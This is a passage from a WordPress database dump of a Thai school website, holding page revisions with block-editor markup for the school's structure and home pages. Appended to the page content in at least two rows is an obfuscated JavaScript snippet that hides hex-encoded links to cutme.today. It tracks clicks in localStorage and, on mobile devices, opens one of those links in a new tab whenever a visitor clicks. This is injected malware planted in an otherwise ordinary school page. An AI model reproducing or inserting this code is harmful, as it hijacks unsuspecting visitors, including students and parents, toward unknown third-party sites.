_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างและอำนาจหน้าที่','','publish','closed','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87','','','2025-07-02 10:47:23','2025-07-02 03:47:23','',0,'http://pakhaeng.ssk.in.th/?page_id=546',0,'page','',0),
(547,1,'2024-08-06 13:17:10','2024-08-06 06:17:10','','โครงสร้าง','','inherit','closed','closed','','546-revision-v1','','','2024-08-06 13:17:10','2024-08-06 06:17:10','',546,'http://pakhaeng.ssk.in.th/?p=547',0,'revision','',0),
(549,1,'2024-08-06 13:18:45','2024-08-06 06:18:45','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:file /--></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:file /--></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงสร้าง','','inherit','closed','closed','','546-revision-v1','','','2024-08-06 13:18:45','2024-08-06 06:18:45','',546,'http://pakhaeng.ssk.in.th/?p=549',0,'revision','',0),
(550,1,'2024-08-06 13:19:59','2024-08-06 06:19:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 